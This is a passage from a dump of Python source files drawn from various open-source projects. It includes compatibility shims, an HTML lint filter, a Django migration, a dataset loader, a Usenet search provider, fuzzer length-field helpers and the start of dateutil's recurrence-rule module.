"unicode_escape") def execute(_code_, _globs_=None, _locs_=None): """Execute code in a namespace.""" if _globs_ is None: frame = 
sys._getframe(1) _globs_ = frame.f_globals if _locs_ is None: _locs_ = frame.f_locals del frame elif _locs_ is None: _locs_ = _globs_ exec("""exec _code_ in _globs_, _locs_""") class _dict_view_base(object): __slots__ = ('_dictionary', ) def __init__(self, dictionary): self._dictionary = dictionary def __repr__(self): return "{0}({1})".format(self.__class__.__name__, str(list(self.__iter__()))) def __unicode__(self): return str(self.__repr__()) def __str__(self): return str(self.__unicode__()) class dict_keys(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.iterkeys() class dict_values(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.itervalues() class dict_items(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.iteritems() def itemsview(collection): return dict_items(collection) def valuesview(collection): return dict_values(collection) def keysview(collection): return dict_keys(collection) class dict(unmodified_isinstance(native_dict)): def has_key(self, *args, **kwargs): return AttributeError("'dict' object has no attribute 'has_key'") def items(self): return dict_items(self) def keys(self): return dict_keys(self) def values(self): return dict_values(self) def round(number, ndigits=None): return_int = False if ndigits is None: return_int = True ndigits = 0 if hasattr(number, '__round__'): return number.__round__(ndigits) if ndigits < 0: raise NotImplementedError('negative ndigits not supported yet') exponent = Decimal('10') ** (-ndigits) d = Decimal.from_float(number).quantize(exponent, rounding=ROUND_HALF_EVEN) if return_int: return int(d) else: return float(d) def next(iterator): try: iterator.__next__() except Exception: native_next(iterator) class FixStr(type): def __new__(cls, name, bases, dct): if '__str__' in dct: dct['__unicode__'] = dct['__str__'] dct['__str__'] = lambda self: self.__unicode__().encode('utf-8') return type.__new__(cls, name, bases, dct) if sys.version_info[1] <= 6: def __instancecheck__(cls, instance): if cls.__name__ == "object": return isinstance(instance, native_object) subclass = getattr(instance, '__class__', None) subtype = type(instance) instance_type = getattr(abc, '_InstanceType', None) if not instance_type: class test_object: pass instance_type = type(test_object) if subtype is instance_type: subtype = subclass if subtype is subclass or subclass is None: return cls.__subclasscheck__(subtype) return (cls.__subclasscheck__(subclass) or cls.__subclasscheck__(subtype)) else: def __instancecheck__(cls, instance): if cls.__name__ == "object": return isinstance(instance, native_object) return type.__instancecheck__(cls, instance) class object(with_metaclass(FixStr, object)): pass __all__ = common + ['round', 'dict', 'apply', 'cmp', 'coerce', 'execfile', 'raw_input', 'unpacks', 'str', 'chr', 'input', 'range', 'filter', 'map', 'zip', 'object']
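# A minimal usage sketch (assumes the pies package is installed): the star
# import swaps in Python-3-style built-ins on Python 2 and leaves Python 3
# untouched.
from pies.overrides import *  # noqa

d = dict(one=1, two=2)
print(list(d.keys()))  # view-style keys() on both Python 2 and 3
print(round(2.5))      # rounds half to even (2) under either interpreter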
impowski/servo
refs/heads/master
tests/wpt/css-tests/tools/html5lib/html5lib/filters/lint.py
979
from __future__ import absolute_import, division, unicode_literals from gettext import gettext _ = gettext from . import _base from ..constants import cdataElements, rcdataElements, voidElements from ..constants import spaceCharacters spaceCharacters = "".join(spaceCharacters) class LintError(Exception): pass class Filter(_base.Filter): def __iter__(self): open_elements = [] contentModelFlag = "PCDATA" for token in _base.Filter.__iter__(self): type = token["type"] if type in ("StartTag", "EmptyTag"): name = token["name"] if contentModelFlag != "PCDATA": raise LintError(_("StartTag not in PCDATA content model flag: %(tag)s") % {"tag": name}) if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) if not name: raise LintError(_("Empty tag name")) if type == "StartTag" and name in voidElements: raise LintError(_("Void element reported as StartTag token: %(tag)s") % {"tag": name}) elif type == "EmptyTag" and name not in voidElements: raise LintError(_("Non-void element reported as EmptyTag token: %(tag)s") % {"tag": token["name"]}) if type == "StartTag": open_elements.append(name) for name, value in token["data"]: if not isinstance(name, str): raise LintError(_("Attribute name is not a string: %(name)r") % {"name": name}) if not name: raise LintError(_("Empty attribute name")) if not isinstance(value, str): raise LintError(_("Attribute value is not a string: %(value)r") % {"value": value}) if name in cdataElements: contentModelFlag = "CDATA" elif name in rcdataElements: contentModelFlag = "RCDATA" elif name == "plaintext": contentModelFlag = "PLAINTEXT" elif type == "EndTag": name = token["name"] if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) if not name: raise LintError(_("Empty tag name")) if name in voidElements: raise LintError(_("Void element reported as EndTag token: %(tag)s") % {"tag": name}) start_name = open_elements.pop() if start_name != name: raise LintError(_("EndTag (%(end)s) does not match StartTag (%(start)s)") % {"end": name, "start": start_name}) contentModelFlag = "PCDATA" elif type == "Comment": if contentModelFlag != "PCDATA": raise LintError(_("Comment not in PCDATA content model flag")) elif type in ("Characters", "SpaceCharacters"): data = token["data"] if not isinstance(data, str): raise LintError(_("Attribute name is not a string: %(name)r") % {"name": data}) if not data: raise LintError(_("%(type)s token with empty data") % {"type": type}) if type == "SpaceCharacters": data = data.strip(spaceCharacters) if data: raise LintError(_("Non-space character(s) found in SpaceCharacters token: %(token)r") % {"token": data}) elif type == "Doctype": name = token["name"] if contentModelFlag != "PCDATA": raise LintError(_("Doctype not in PCDATA content model flag: %(name)s") % {"name": name}) if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) # XXX: what to do with token["data"] ? elif type in ("ParseError", "SerializeError"): pass else: raise LintError(_("Unknown token type: %(type)s") % {"type": type}) yield token
mbauskar/Das_frappe
refs/heads/develop
frappe/core/doctype/userrole/__init__.py
1829
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt

from __future__ import unicode_literals
XeryusTC/rotd
refs/heads/master
recipes/migrations/0007_auto_20150904_1819.py
1
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('recipes', '0006_ingredient'),
    ]

    operations = [
        migrations.AlterField(
            model_name='ingredient',
            name='used_in',
            field=models.ManyToManyField(to='recipes.Recipe', blank=True),
        ),
    ]
chandlercr/aima-python
refs/heads/master
submissions/Kinley/drugs.py
15
''' Hello student. Thank you for downloading a CORGIS library. However, you do not need to open this library. Instead you should use the following: import drugs If you opened the file because you are curious how this library works, then well done! We hope that you find it a useful learning experience. However, you should know that this code is meant to solve somewhat esoteric pedagogical problems, so it is often not best practices. ''' import sys as _sys import os as _os import json as _json import sqlite3 as _sql import difflib as _difflib class _Constants(object): ''' Global singleton object to hide some of the constants; some IDEs reveal internal module details very aggressively, and there's no other way to hide stuff. ''' _HEADER = {'User-Agent': 'CORGIS Drugs library for educational purposes'} _PYTHON_3 = _sys.version_info >= (3, 0) _TEST = False _HARDWARE = 100 if _Constants._PYTHON_3: import urllib.request as _request from urllib.parse import quote_plus as _quote_plus from urllib.error import HTTPError as _HTTPError else: import urllib2 as _urllib2 from urllib import quote_plus as _quote_plus from urllib2 import HTTPError as _HTTPError class DatasetException(Exception): ''' Thrown when there is an error loading the dataset for some reason.''' pass _Constants._DATABASE_NAME = "drugs.db" if not _os.access(_Constants._DATABASE_NAME, _os.F_OK): raise DatasetException("Error! Could not find a \"{0}\" file. Make sure that there is a \"{0}\" in the same directory as \"{1}.py\"! Spelling is very important here.".format(_Constants._DATABASE_NAME, __name__)) elif not _os.access(_Constants._DATABASE_NAME, _os.R_OK): raise DatasetException("Error! Could not read the \"{0}\" file. Make sure that it readable by changing its permissions. You may need to get help from your instructor.".format(_Constants._DATABASE_NAME, __name__)) elif not _os.access(_Constants._DATABASE_NAME, _os.W_OK): _sys.stderr.write('The local cache (\" \") will not be updated. Make sure that it is writable by changing its permissions. You may need to get help from your instructor.\n'.format(_Constants._DATABASE_NAME)) _sys.stderr.flush() _Constants._DATABASE = _sql.connect(_Constants._DATABASE_NAME) class _Auxiliary(object): @staticmethod def _parse_type(value, type_func): """ Attempt to cast *value* into *type_func*, returning *default* if it fails. """ default = type_func(0) if value is None: return default try: return type_func(value) except ValueError: return default @staticmethod def _byteify(input): """ Force the given input to only use `str` instead of `bytes` or `unicode`. 
This works even if the input is a dict, list, """ if isinstance(input, dict): return {_Auxiliary._byteify(key): _Auxiliary._byteify(value) for key, value in input.items()} elif isinstance(input, list): return [_Auxiliary._byteify(element) for element in input] elif _Constants._PYTHON_3 and isinstance(input, str): return str(input.encode('ascii', 'replace').decode('ascii')) elif not _Constants._PYTHON_3 and isinstance(input, unicode): return str(input.encode('ascii', 'replace').decode('ascii')) else: return input @staticmethod def _guess_schema(input): if isinstance(input, dict): return {str(key.encode('ascii', 'replace').decode('ascii')): _Auxiliary._guess_schema(value) for key, value in input.items()} elif isinstance(input, list): return [_Auxiliary._guess_schema(input[0])] if input else [] else: return type(input) ################################################################################ # Domain Objects ################################################################################ ################################################################################ # Interfaces ################################################################################ def get_surveys(question): """ Given one of the survey questions, returns the associated data from respondents. :param question: The name of the survey question. Must be one of 'Cocaine Year', 'Alcohol Month', 'Cigarette Use', 'Alcohol Risk', 'Illicit/Alcohol Dependence or Abuse', 'Marijuana New', 'Illicit Dependence', 'Alcohol Dependence', 'Tobacco Use', 'Alcohol Binge', 'Marijuana Risk', 'Alcohol Abuse', 'Marijuana Month', 'Illicit Dependence or Abuse', 'Smoking Risk', 'Illicit Month', 'Alcohol Treatment', 'Nonmarijuana Illicit', 'Pain Relievers', 'Marijuana Year', 'Illicit Treatment', 'Depression'. :type question: str """ # Match it against recommend values potentials = [r[0].lower() for r in _Constants._DATABASE.execute("SELECT DISTINCT name FROM drugs").fetchall()] if question.lower() not in potentials: best_guesses = _difflib.get_close_matches(question, potentials) if best_guesses: raise DatasetException("Error, the given identifier could not be found. Perhaps you meant one of:\n\t{}".format('\n\t'.join(map('"{}"'.format, best_guesses)))) else: raise DatasetException("Error, the given identifier could not be found. Please check to make sure you have the right spelling.") if False: # If there was a Test version of this method, it would go here. But alas. pass else: rows = _Constants._DATABASE.execute("SELECT data FROM drugs WHERE name=? 
COLLATE NOCASE".format( hardware=_Constants._HARDWARE), (question, )) data = [r[0] for r in rows] data = [_Auxiliary._byteify(_json.loads(r)) for r in data] return _Auxiliary._byteify(data) ################################################################################ # Internalized testing code ################################################################################ def _test_interfaces(): from pprint import pprint as _pprint from timeit import default_timer as _default_timer # Production test print("Production get_surveys") start_time = _default_timer() result = get_surveys("'Cigarette Use'") print("{} entries found.".format(len(result))) _pprint(_Auxiliary._guess_schema(result)) print("Time taken: {}".format(_default_timer() - start_time)) if __name__ == '__main__': from optparse import OptionParser as _OptionParser _parser = _OptionParser() _parser.add_option("-t", "--test", action="store_true", default=False, help="Execute the interfaces to test them.") _parser.add_option("-r", "--reset", action="store_true", default=False, help="Reset the cache") (_options, _args) = _parser.parse_args() if _options.test: _test_interfaces() if _options.reset: _modify_self()
prvnkumar/powerline
refs/heads/develop
powerline/renderers/shell/zsh.py
38
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)

from powerline.renderers.shell import ShellRenderer


class ZshPromptRenderer(ShellRenderer):
    '''Powerline zsh prompt segment renderer.'''
    escape_hl_start = '%{'
    escape_hl_end = '%}'

    character_translations = ShellRenderer.character_translations.copy()
    character_translations[ord('%')] = '%%'


renderer = ZshPromptRenderer
mattesno1/Sick-Beard
refs/heads/master
sickbeard/providers/nzbclub.py
2
#!/usr/bin/env python # -*- coding: utf-8 -*- # Author: Nic Wolfe <nic@wolfeden.ca> # URL: http://code.google.com/p/sickbeard/ # # This file is part of Sick Beard. # # Sick Beard is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Sick Beard is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Sick Beard. If not, see <http://www.gnu.org/licenses/>. import re import time import urllib import datetime import traceback NZBCLUB_RSS_URL = "http://www.nzbclub.com/nzbrss.aspx" try: import xml.etree.cElementTree as etree except ImportError: import elementtree.ElementTree as etree import sickbeard import generic from sickbeard import classes, logger, show_name_helpers, helpers from sickbeard import tvcache from sickbeard.exceptions import ex from lib.dateutil.parser import parse as parseDate class NZBClubProvider(generic.NZBProvider): def __init__(self): generic.NZBProvider.__init__(self, "NZBClub") self.supportsBacklog = True self.cache = NZBClubCache(self) self.url = 'http://nzbclub.com/' self.searchString = '' def isEnabled(self): return sickbeard.NZBCLUB def _get_season_search_strings(self, show, season): # sceneSearchStrings = set(show_name_helpers.makeSceneSeasonSearchString(show, season, "NZBIndex")) # # search for all show names and episode numbers like ("a","b","c") in a single search # return [' '.join(sceneSearchStrings)] return [x for x in show_name_helpers.makeSceneSeasonSearchString(show, season)] def _get_episode_search_strings(self, ep_obj): # # tvrname is better for most shows # if ep_obj.show.tvrname: # searchStr = ep_obj.show.tvrname + " S%02dE%02d"%(ep_obj.season, ep_obj.episode) # else: # searchStr = ep_obj.show.name + " S%02dE%02d"%(ep_obj.season, ep_obj.episode) # return [searchStr] return [x for x in show_name_helpers.makeSceneSearchString(ep_obj)] def _get_title_and_url(self, item): (title, url) = super(NZBClubProvider, self)._get_title_and_url(item) url = url.replace("/nzb_view/","/nzb_get/") + ".nzb" logger.log( '_get_title_and_url(%s), returns (%s, %s)' %(item, title, url), logger.DEBUG) logger.log( 'self.searchString=%s' %(self.searchString), logger.DEBUG) # try to filter relevant parts from title stitle = filter( lambda x: x.lower().startswith( self.searchString.lower().strip().split()[0] ), re.sub( '\s+', ' ', re.sub('[\[\]\(\)\<\>]+', ' ', title) ).strip().split() ) if len(stitle) > 1: logger.log( 'more than one result for the fixed title (%s), using first.' % stitle, logger.ERROR ) if stitle: title = stitle[0] logger.log( 'fixed title: "%s"' % title, logger.DEBUG) return (title, url) def _doSearch(self, curString, quotes=False, show=None): term = re.sub('[\.\-\:]', ' ', curString).encode('utf-8') self.searchString = term if quotes: term = "\""+term+"\"" params = {"q": term, "rpp": 50, #max 50 "ns": 1, #nospam "szs":16, #min 100MB "sp":1 #nopass } searchURL = NZBCLUB_RSS_URL + "?" 
+ urllib.urlencode(params) logger.log(u"Search string: " + searchURL) logger.log(u"Sleeping 10 seconds to respect NZBClub's rules") time.sleep(10) searchResult = self.getURL(searchURL,[("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0) Gecko/20100101 Firefox/5.0"),("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),("Accept-Language","de-de,de;q=0.8,en-us;q=0.5,en;q=0.3"),("Accept-Charset","ISO-8859-1,utf-8;q=0.7,*;q=0.7"),("Connection","keep-alive"),("Cache-Control","max-age=0")]) if not searchResult: return [] try: parsedXML = etree.fromstring(searchResult) items = parsedXML.iter('item') except Exception, e: logger.log(u"Error trying to load NZBClub RSS feed: "+ex(e), logger.ERROR) return [] results = [] for curItem in items: (title, url) = self._get_title_and_url(curItem) if not title or not url: logger.log(u"The XML returned from the NZBClub RSS feed is incomplete, this result is unusable", logger.ERROR) continue if not title == 'Not_Valid': results.append(curItem) return results def findPropers(self, date=None): results = [] for curResult in self._doSearch("(PROPER,REPACK)"): (title, url) = self._get_title_and_url(curResult) pubDate_node = curResult.find('pubDate') pubDate = helpers.get_xml_text(pubDate_node) dateStr = re.search('(\w{3}, \d{1,2} \w{3} \d{4} \d\d:\d\d:\d\d) [\+\-]\d{4}', pubDate) if not dateStr: logger.log(u"Unable to figure out the date for entry "+title+", skipping it") continue else: resultDate = parseDate(dateStr.group(1)).replace(tzinfo=None) if date == None or resultDate > date: results.append(classes.Proper(title, url, resultDate)) return results class NZBClubCache(tvcache.TVCache): def __init__(self, provider): tvcache.TVCache.__init__(self, provider) # only poll NZBIndex every 25 minutes max self.minTime = 25 def _getRSSData(self): # get all records since the last timestamp url = "%s?" % NZBCLUB_RSS_URL urlArgs = {'q': '', "rpp": 50, #max 50 "ns": 1, #nospam "szs":16, #min 100MB "sp":1 #nopass } url += urllib.urlencode(urlArgs) logger.log(u"NZBClub cache update URL: "+ url, logger.DEBUG) data = self.provider.getURL(url) return data provider = NZBClubProvider()
kalahbrown/HueBigSQL
refs/heads/master
desktop/core/ext-py/cx_Oracle-5.1.2/test/TestEnv.py
34
"""Define test environment.""" import cx_Oracle import os import sys import unittest def GetValue(name, label): value = os.environ.get("CX_ORACLE_" + name) if value is None: value = raw_input(label + ": ") if hasattr(cx_Oracle, "UNICODE") or sys.version_info[0] >= 3: return value return unicode(value) USERNAME = GetValue("USERNAME", "user name") PASSWORD = GetValue("PASSWORD", "password") TNSENTRY = GetValue("TNSENTRY", "TNS entry") ARRAY_SIZE = int(GetValue("ARRAY_SIZE", "array size"))
ernw/dizzy
refs/heads/master
dizzy/functions/length.py
1
# length.py # # Copyright 2017 Daniel Mende <mail@c0decafe.de> # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from dizzy.config import CONFIG from dizzy.value import Value from dizzy.tools import pack_with_length from dizzy.objects import START, END from dizzy.log import print_dizzy, DEBUG from . import BOTH def length(target, start=START, stop=END, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length(dizzy_iterator[start:stop].size, size, endian), size) print_dizzy("length/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length/%s: is not updated." % (target,), DEBUG) return (func, when) def length_bytes(target, start=START, stop=END, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length((dizzy_iterator[start:stop].size + 7) // 8, size, endian), size) print_dizzy("length_bytes/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_bytes/%s: is not updated." % (target,), DEBUG) return (func, when) def length_string_bytes(target, start=START, stop=END, encoding=CONFIG["GLOBALS"]["CODEC"], when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = str((dizzy_iterator[start:stop].size + 7) // 8) value = Value(bytes(size, encoding), len(size) * 8) print_dizzy("length_string_bytes/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_string_bytes/%s: is not updated." % (target,), DEBUG) return (func, when) def length_lambda(target, start=START, stop=END, lam=lambda x: x, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length(lam(dizzy_iterator[start:stop].size), size, endian), size) print_dizzy("length_lambda/%s: seting to %s." 
% (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_lambda/%s: is not updated." % (target,), DEBUG) return (func, when) def length_lambda2(target, start=START, stop=END, lam=lambda x: x, lam2=lambda x: x, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = lam(dizzy_iterator[target].size) value = Value(pack_with_length(lam2(dizzy_iterator[start:stop].size), size, endian), size) print_dizzy("length_lambda2/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_lambda2/%s: is not updated." % (target,), DEBUG) return (func, when)
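# A small illustration of the length arithmetic the byte-oriented helpers above
# rely on (not part of the dizzy API itself): sizes are tracked in bits and
# rounded up to whole bytes with (size + 7) // 8 before packing.
def _bits_to_bytes(size_in_bits):
    return (size_in_bits + 7) // 8

assert _bits_to_bytes(8) == 1
assert _bits_to_bytes(12) == 2  # a partial byte rounds up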
Eforcers/inbox-cleaner
refs/heads/master
src/lib/dateutil/rrule.py
254
""" Copyright (c) 2003-2010 Gustavo Niemeyer <gustavo@niemeyer.net> This module offers extensions to the standard python 2.3+ datetime module. """ __author__ = "Gustavo Niemeyer <gustavo@niemeyer.net>" __license__ = "PSF License" import itertools import datetime import calendar import thread import sys __all__ = ["rrule", "rruleset", "rrulestr", "YEARLY", "MONTHLY", "WEEKLY", "DAILY", "HOURLY", "MINUTELY", "SECONDLY", "MO", "TU", "WE", "TH", "FR", "SA", "SU"] # Every mask is 7 days longer to handle cross-year weekly periods. M366MASK = tuple([1]*31+[2]*29+[3]*31+[4]*30+[5]*31+[6]*30+ [7]*31+[8]*31+[9]*30+[10]*31+[11]*30+[12]*31+[1]*7) M365MASK = list(M366MASK) M29, M30, M31 = range(1,30), range(1,31), range(1,32) MDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) MDAY365MASK = list(MDAY366MASK) M29, M30, M31 = range(-29,0), range(-30,0), range(-31,0) NMDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) NMDAY365MASK = list(NMDAY366MASK) M366RANGE = (0,31,60,91,121,152,182,213,244,274,305,335,366) M365RANGE = (0,31,59,90,120,151,181,212,243,273,304,334,365) WDAYMASK = [0,1,2,3,4,5,6]*55 del M29, M30, M31, M365MASK[59], MDAY365MASK[59], NMDAY365MASK[31] MDAY365MASK = tuple(MDAY365MASK) M365MASK = tuple(M365MASK) (YEARLY, MONTHLY, WEEKLY, DAILY, HOURLY, MINUTELY, SECONDLY) = range(7) # Imported on demand. easter = None parser = None class weekday(object): __slots__ = ["weekday", "n"] def __init__(self, weekday, n=None): if n == 0: raise ValueError, "Can't create weekday with n == 0" self.weekday = weekday self.n = n def __call__(self, n): if n == self.n: return self else: return self.__class__(self.weekday, n) def __eq__(self, other): try: if self.weekday != other.weekday or self.n != other.n: return False except AttributeError: return False return True def __repr__(self): s = ("MO", "TU", "WE", "TH", "FR", "SA", "SU")[self.weekday] if not self.n: return s else: return "%s(%+d)" % (s, self.n) MO, TU, WE, TH, FR, SA, SU = weekdays = tuple([weekday(x) for x in range(7)]) class rrulebase: def __init__(self, cache=False): if cache: self._cache = [] self._cache_lock = thread.allocate_lock() self._cache_gen = self._iter() self._cache_complete = False else: self._cache = None self._cache_complete = False self._len = None def __iter__(self): if self._cache_complete: return iter(self._cache) elif self._cache is None: return self._iter() else: return self._iter_cached() def _iter_cached(self): i = 0 gen = self._cache_gen cache = self._cache acquire = self._cache_lock.acquire release = self._cache_lock.release while gen: if i == len(cache): acquire() if self._cache_complete: break try: for j in range(10): cache.append(gen.next()) except StopIteration: self._cache_gen = gen = None self._cache_complete = True break release() yield cache[i] i += 1 while i < self._len: yield cache[i] i += 1 def __getitem__(self, item): if self._cache_complete: return self._cache[item] elif isinstance(item, slice): if item.step and item.step < 0: return list(iter(self))[item] else: return list(itertools.islice(self, item.start or 0, item.stop or sys.maxint, item.step or 1)) elif item >= 0: gen = iter(self) try: for i in range(item+1): res = gen.next() except StopIteration: raise IndexError return res else: return list(iter(self))[item] def __contains__(self, item): if self._cache_complete: return item in self._cache else: for i in self: if i == item: return True elif i > item: return False return False # __len__() introduces a large performance penality. 
def count(self): if self._len is None: for x in self: pass return self._len def before(self, dt, inc=False): if self._cache_complete: gen = self._cache else: gen = self last = None if inc: for i in gen: if i > dt: break last = i else: for i in gen: if i >= dt: break last = i return last def after(self, dt, inc=False): if self._cache_complete: gen = self._cache else: gen = self if inc: for i in gen: if i >= dt: return i else: for i in gen: if i > dt: return i return None def between(self, after, before, inc=False): if self._cache_complete: gen = self._cache else: gen = self started = False l = [] if inc: for i in gen: if i > before: break elif not started: if i >= after: started = True l.append(i) else: l.append(i) else: for i in gen: if i >= before: break elif not started: if i > after: started = True l.append(i) else: l.append(i) return l class rrule(rrulebase): def __init__(self, freq, dtstart=None, interval=1, wkst=None, count=None, until=None, bysetpos=None, bymonth=None, bymonthday=None, byyearday=None, byeaster=None, byweekno=None, byweekday=None, byhour=None, byminute=None, bysecond=None, cache=False): rrulebase.__init__(self, cache) global easter if not dtstart: dtstart = datetime.datetime.now().replace(microsecond=0) elif not isinstance(dtstart, datetime.datetime): dtstart = datetime.datetime.fromordinal(dtstart.toordinal()) else: dtstart = dtstart.replace(microsecond=0) self._dtstart = dtstart self._tzinfo = dtstart.tzinfo self._freq = freq self._interval = interval self._count = count if until and not isinstance(until, datetime.datetime): until = datetime.datetime.fromordinal(until.toordinal()) self._until = until if wkst is None: self._wkst = calendar.firstweekday() elif type(wkst) is int: self._wkst = wkst else: self._wkst = wkst.weekday if bysetpos is None: self._bysetpos = None elif type(bysetpos) is int: if bysetpos == 0 or not (-366 <= bysetpos <= 366): raise ValueError("bysetpos must be between 1 and 366, " "or between -366 and -1") self._bysetpos = (bysetpos,) else: self._bysetpos = tuple(bysetpos) for pos in self._bysetpos: if pos == 0 or not (-366 <= pos <= 366): raise ValueError("bysetpos must be between 1 and 366, " "or between -366 and -1") if not (byweekno or byyearday or bymonthday or byweekday is not None or byeaster is not None): if freq == YEARLY: if not bymonth: bymonth = dtstart.month bymonthday = dtstart.day elif freq == MONTHLY: bymonthday = dtstart.day elif freq == WEEKLY: byweekday = dtstart.weekday() # bymonth if not bymonth: self._bymonth = None elif type(bymonth) is int: self._bymonth = (bymonth,) else: self._bymonth = tuple(bymonth) # byyearday if not byyearday: self._byyearday = None elif type(byyearday) is int: self._byyearday = (byyearday,) else: self._byyearday = tuple(byyearday) # byeaster if byeaster is not None: if not easter: from dateutil import easter if type(byeaster) is int: self._byeaster = (byeaster,) else: self._byeaster = tuple(byeaster) else: self._byeaster = None # bymonthay if not bymonthday: self._bymonthday = () self._bynmonthday = () elif type(bymonthday) is int: if bymonthday < 0: self._bynmonthday = (bymonthday,) self._bymonthday = () else: self._bymonthday = (bymonthday,) self._bynmonthday = () else: self._bymonthday = tuple([x for x in bymonthday if x > 0]) self._bynmonthday = tuple([x for x in bymonthday if x < 0]) # byweekno if byweekno is None: self._byweekno = None elif type(byweekno) is int: self._byweekno = (byweekno,) else: self._byweekno = tuple(byweekno) # byweekday / bynweekday if byweekday is None: self._byweekday 
= None self._bynweekday = None elif type(byweekday) is int: self._byweekday = (byweekday,) self._bynweekday = None elif hasattr(byweekday, "n"): if not byweekday.n or freq > MONTHLY: self._byweekday = (byweekday.weekday,) self._bynweekday = None else: self._bynweekday = ((byweekday.weekday, byweekday.n),) self._byweekday = None else: self._byweekday = [] self._bynweekday = [] for wday in byweekday: if type(wday) is int: self._byweekday.append(wday) elif not wday.n or freq > MONTHLY: self._byweekday.append(wday.weekday) else: self._bynweekday.append((wday.weekday, wday.n)) self._byweekday = tuple(self._byweekday) self._bynweekday = tuple(self._bynweekday) if not self._byweekday: self._byweekday = None elif not self._bynweekday: self._bynweekday = None # byhour if byhour is None: if freq < HOURLY: self._byhour = (dtstart.hour,) else: self._byhour = None elif type(byhour) is int: self._byhour = (byhour,) else: self._byhour = tuple(byhour) # byminute if byminute is None: if freq < MINUTELY: self._byminute = (dtstart.minute,) else: self._byminute = None elif type(byminute) is int: self._byminute = (byminute,) else: self._byminute = tuple(byminute) # bysecond if bysecond is None: if freq < SECONDLY: self._bysecond = (dtstart.second,) else: self._bysecond = None elif type(bysecond) is int: self._bysecond = (bysecond,) else: self._bysecond = tuple(bysecond) if self._freq >= HOURLY: self._timeset = None else: self._timeset = [] for hour in self._byhour: for minute in self._byminute: for second in self._bysecond: self._timeset.append( datetime.time(hour, minute, second, tzinfo=self._tzinfo)) self._timeset.sort() self._timeset = tuple(self._timeset) def _iter(self): year, month, day, hour, minute, second, weekday, yearday, _ = \ self._dtstart.timetuple() # Some local variables to speed things up a bit freq = self._freq interval = self._interval wkst = self._wkst until = self._until bymonth = self._bymonth byweekno = self._byweekno byyearday = self._byyearday byweekday = self._byweekday byeaster = self._byeaster bymonthday = self._bymonthday bynmonthday = self._bynmonthday bysetpos = self._bysetpos byhour = self._byhour byminute = self._byminute bysecond = self._bysecond ii = _iterinfo(self) ii.rebuild(year, month) getdayset = {YEARLY:ii.ydayset, MONTHLY:ii.mdayset, WEEKLY:ii.wdayset, DAILY:ii.ddayset, HOURLY:ii.ddayset, MINUTELY:ii.ddayset, SECONDLY:ii.ddayset}[freq] if freq < HOURLY: timeset = self._timeset else: gettimeset = {HOURLY:ii.htimeset, MINUTELY:ii.mtimeset, SECONDLY:ii.stimeset}[freq] if ((freq >= HOURLY and self._byhour and hour not in self._byhour) or (freq >= MINUTELY and self._byminute and minute not in self._byminute) or (freq >= SECONDLY and self._bysecond and second not in self._bysecond)): timeset = () else: timeset = gettimeset(hour, minute, second) total = 0 count = self._count while True: # Get dayset with the right frequency dayset, start, end = getdayset(year, month, day) # Do the "hard" work ;-) filtered = False for i in 